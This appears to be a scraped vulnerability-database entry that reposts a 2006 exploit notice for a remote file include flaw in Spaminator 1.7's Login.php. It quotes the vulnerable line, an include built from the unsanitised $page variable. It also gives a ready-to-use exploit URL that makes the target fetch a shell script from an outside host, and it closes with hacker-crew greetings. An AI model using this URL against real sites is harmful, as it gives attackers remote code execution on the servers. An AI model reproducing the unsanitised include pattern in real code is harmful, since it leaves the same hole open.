Lucene search
SecurityvulnsSECURITYVULNS:DOC:13843HistoryAug 10, 2006 - 12:00 a.m.
Spaminator 1.7. ($page) Remote File Include
2006-08-1000:00:00
vulners.com
15
Spaminator 1.7. ($page) Remote File Include
CreW: ToXiC
BuG Found By Drago84
SourcE CodE:
http://freshmeat.net/redir/spaminator/16281/url_tgz/spaminator-1.7.tar.gz
Page Affect is:
/src/Login.php
Problem is
include "$page.php";
Path :
Declare $page
ExpL:
http://www.site.com/dir_spaminator/src/Login.php?page=http://www.evalsite.com/shell.php?
Greatz:str0ke